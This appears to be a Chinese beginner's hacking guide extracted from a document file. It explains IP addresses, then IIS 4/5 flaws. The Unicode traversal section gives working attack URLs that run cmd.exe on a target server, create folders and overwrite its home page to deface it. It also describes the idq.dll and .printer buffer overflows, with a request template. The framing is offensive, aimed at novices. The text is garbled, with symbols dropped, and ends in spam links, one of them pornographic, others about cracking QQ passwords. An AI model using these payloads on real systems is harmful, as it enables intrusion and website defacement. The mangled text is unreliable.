从零开始学黑客：网络黑客新手入门指南.doc

1、从零开始学黑客：网络黑客新手入门指南（一）系统基本知识1.a.什么是 IP:要是真的想说清楚什么是 IP，那是一项很繁重的工作。简单的来说 IP 就是所有 Internet 或是局域网上的主机的身份证。所有网络的机器连接起来后，每台机器都会有一个唯一的合法的 IP 地址，一台机器和别的指定的机器通讯都要依据 IP 来实现的。IP 地址的写法为 XXX.XXX.XXX.XXX。有四段数字组成，第一段数字可为1-255,后三段数字可为0-255，且所有的 IP 地址分为 A、B、C、D、E 五类，主要是 A、B 、C 三类。其有效范围如下表所示：类别 网络号 主机号A 1126 0255 0255

2、 1254B 128191 0255 0255 1 254C 192223 0255 0255 1 254有关 IP 地址的问题可以查阅相关的资料，笔者在此就不再多耗笔墨了。呵呵: p1.b.怎样得到自己和别人的 IP 呢？以 Windows 98为例：在“ 开始 ”“运行”里输入：winipcfg。接着，Windows 就会打开“IP 配置” 。其中，在“Ethernet 适配器信息” “IP 地址”会显示 xxx.xxx.xxx.xxx,这就是你的 IP。要想得到别人的 IP，可以使用一些工具软件，不过最简单的使用 Windows 自带的一个小程序ping.exe。在 MS-DOS 命令行

3、下输入 ping 。会出现：C:ping Pinging xxx.xxx.xxx.xxx with 32 bytes of data:Reply from xxx.xxx.xxx.xxx: bytes=32 time=630ms TTL=116Reply from xxx.xxx.xxx.xxx: bytes=32 time=630ms TTL=116Reply from xxx.xxx.xxx.xxx: bytes=32 time=120ms TTL=116Ping statistics for xxx.xxx.xxx.xxx:Packets: Sent = 4, Received = 4

4、, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:Minimum = 120ms, Maximum = 630ms, Average = 187ms其中：xxx.xxx.xxx.xxx 就是 http:/ 的网络服务器的 IP 地址。2.a.Unicode 漏洞：“Unicode 漏洞”是微软 IIS 的一个重大漏洞。2001年最热门漏洞之一。下面我们来简要介绍一下它的原理。IIS 4.0和 IIS 5.0在 Unicode 字符解码的实现中存在一个安全漏洞，导致用户可以远程通过 IIS 执行任意命令。当 II

5、S 打开文件时，如果该文件名包含 Unicode 字符，它会对其进行解码，如果用户提供一些特殊的编码，将导致 IIS 错误的打开或者执行某些 web 根目录以外的文件。攻击者可以利用这个漏洞来绕过 IIS 的路径检查，去执行或者打开任意的文件。此漏洞从中文 IIS4.0+SP6开始，还影响中文 WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，台湾繁体中文也同样存在这样的漏洞。 （Win NT4 编码为：%c1%9c ，Win2000 英文版 编码为：%c0%af ）假设目标主机为英文版 Winodows 2k，IP 为 xxx.xxx.xxx.xxx，且存在 Unico

6、de 漏洞，那么我们在浏览器里输入：http:/x.x.x.x/scripts/.%c0%af./winnt/system32/cmd.exe?/c+dir ，之后浏览器就会显示如下内容：Directory of C:inetpubscripts2002-02-08 15:49 DIR .2002-02-08 15:49 DIR .2002-02-08 10:20 Index.html2002-02-08 10:20 background.jpg.从上面的测试可以看出：“http:/x.x.x.x/scripts/.%c0%af./winnt/system32/cmd.exe?/c+“ 后就是

7、 DOS 命令了：“dir“以此类推，我们可以利用浏览器远程执行任意命令，看下面的例子：在浏览器里输入 http:/x.x.x.x/scripts/.%c0%af. . ?/c+dir+md+d:Nature,运行后我们可以看到返回这样的结果：CGI ErrorThe specified CGI application misbehaved by not returning a completeset of HTTP headers. The headers it did return are:英文意思是：CGI 错误具体的 CGI 申请有误，不能返回完整的 HTTP 标题，返回的标题为：但是

8、，你其实仍然在目标主机的 D: 里建立了一个名为:Nature 的文件夹。2.b.利用 Unicode 漏洞我们还可以简单的修改目标主机的 WEB 文件。一般情况下，我们要修改目标主机的 web 文件，常用到的方法是利用 echo 回显、管道工具“” “” 。如果你对这些命令不熟悉，可以键入以下命令以查看帮助文档，如：C:echo/?显示信息，或将命令响应打开或关上。ECHO ON | OFFECHO message仅键入 ECHO 而不加参数，可以显示当前的 ECHO 设置。管道工具“” “” 的不同之处“”“”是将命令产生的输出重新定向,比如写到某个文件或输出到打印机中。“”将产生的内容追

9、加进文件中， “”则将原文件内容覆盖。IIS 加载程序检测到有 cmd.exe 或者 串就要检测特殊字符“%”。如果发现有这些字符就会返回500错误，所以不能直接使用 cmd.exe 加管道符等。如果我们输入：http:/x.x.x.x/scripts/.%c0%af./winnt/system32/cmd.exe?/c+echo+内容+ d:cnhack.bat我们可以看到提示:HTTP 500 - 内部服务器错误Internet Explorer所以我们如果要 echo 和的结合使用，就应该这样输入: http:/x.x.x.x/scripts/.%c0%af./winnt/system

10、32/cmd“.exe?/c+echo+Hacked By Nature+ c:inetpubwwwrootindex.html (注意：这两个命令的区别是，后一个比前一个在 cmd 后多了一个“ 符号)，完成后看它的主页已经被修改成了：Hacked By Nature 了。其实只要我们弄懂这个漏洞的使用，仅仅使用 IE，我们就可以“ 黑 ”掉一个网站咯！就这么简单！3.idq.dll 缓冲区溢出漏洞。作为安装过程的一部分，IIS 安装了几个 ISAPI 扩展 .dlls 。其中的 idq.dll 存在问题，它是 Index Server 的一个组件，对管理员脚本(.ida 文件 )和 Int

11、ernet 数据查询 (.idq 文件）提供支持。但是，idq.dll 在处理一段 URL 输入的代码中存在一个未经检查的缓冲区。攻击者利用此漏洞能导致受影响服务器产生缓冲区溢出，从而执行自己提供的代码。而更为严重的是，idq.dll 是以 SYSTEM 身份运行的，攻击者成功利用此漏洞后能取得系统管理员权限。(SYSTEM 权限相当于超级管理员权限，很值得注意！)Windows 2k 和 NT 都受到了不同程度的影响。4.IIS.printer 漏洞（应用程序映射缓冲溢出）：这也是近期比较流行的漏洞，国内国外仍有 N 台机器存在此漏洞。微软 Windows 2000 IIS 5的打印 ISA

12、PI 扩展接口建立了.printer 扩展名到 msw3prt.dll 的映射关系，缺省情况下该映射存在。当远程用户提交对.printer 的 URL 请求时，IIS 5调用 msw3prt.dll 解释该请求。由于msw3prt.dll 缺乏足够的缓冲区边界检查，远程用户可以提交一个精心构造的针对.printer 的 URL 请求，其“Host:“域包含大约420字节的数据，此时在 msw3prt.dll 中发生典型的缓冲区溢出，潜在允许执行任意代码。溢出发生后，WEB 服务停止响应，Win 2K 可以检查到 WEB 服务停止响应，从而自动重启它，因此系统管理员很难意识到发生过攻击。默认情况

13、下，IIS 5.0服务器存在一个后缀为“printer“的应用程序映射，这个映射使用位于 WINNTSystem32下的名为 msw3prt.dll 的动态库文件。这个功能是用于基于 Web 控制的网络打印的，是 Windows2000为 Internet Printing Protocol(IPP)协议而设置的应用程序功能。不幸的是，这个映射存在一个缓冲区溢出错误，可以导致 inetinfo.exe 出错，允许黑客通过 web 获取服务器的管理权限，黑客制造一个 .printer 的 ISAPI 请求，当 Http host 参数的值达到420个字符时，就会发生缓冲区溢出：GET /NULL

14、.printer HTTP/1.0Host: buffer漂亮少妇被搞到高潮一波接一波HACKER 菜鸟入门经典 从零开始学黑客：网络黑客新手入门指南 网上邻居”的十大经典应用技巧 硬盘更快 让系统更稳定的九个环节 让 Vista 用得更好的常用 10 大攻略 把 U 盘当作电脑钥匙的神奇方法 怎么能让 windows vista 运行速度加快 教你一个高招：随时锁定计算机，外人勿动！ 笔记本电脑省电之三妙招 移动硬盘或 U 盘无法退出怎么办 高手总结的电脑技巧 一秒钟就能破解锁定的网页 教你把 U 盘变成一台“电脑”如何把 1G 的文件变成 1M 的方法教你电脑自动开机并播放音乐提醒你起床，

15、且晚上自动关机最“无耻”的电脑知识不信来看看与众不同 修改 Windows 文件夹的颜色系统自带的最不起眼但又最强的杀毒工具注册表应用 100 例手把手教你组建无线局域网打印机十大共性故障解决方法恶意修改 IE 的十三种简单处理办法遇到恶意网页时的现象及处理办法u 盘改造成强大路由器操作系统文件夹怎么加入背景音乐清剿流氓软件的八大绝技让你 U 盘永远不中毒教你封杀网络木马病毒十大高招定时清理这 5 个文件夹，内存即刻提升！如何让 MP3 拒绝病毒的入侵让硬盘工作在最佳状态的小技巧精好多大学视频教程,让你省去几万块的大学学费利用记事本来清除病毒万能查杀“木马”技巧QQ 农场种植哪些作物会亏本将电

16、脑调整到最佳状态就几招QQ 各类软件精品下载（QQ 最新 2009 相册破解器改进版、QQ 牧场、表情等）如何设置防火墙禁用 QQ、MSN教你让一台电脑只能上允许的 QQ做漂亮 QQ 空间全部技术免费送上另类 QQ 玩法.你会吗?通过网页查看在线状态80 多个 QQ 常用的小技巧.!让你用 QQ 更轻松,更清楚.最新 QQ 空间密码破解真正有效的 QQ 加速升级法QQ 农场偷菜的最新小技巧解决 QQ 常在异地登录的原因三个技巧防止 QQ 聊天记录被盗如何封别人 QQ教你快速克隆对方 QQ 好友使用的文字格式QQ 11 种 QQ 技术 ,让你成为 QQ 高手在公司偷着上 QQ 的绝密技巧教你克隆别人漂亮的 QQ 空间QQ 农场快速登陆器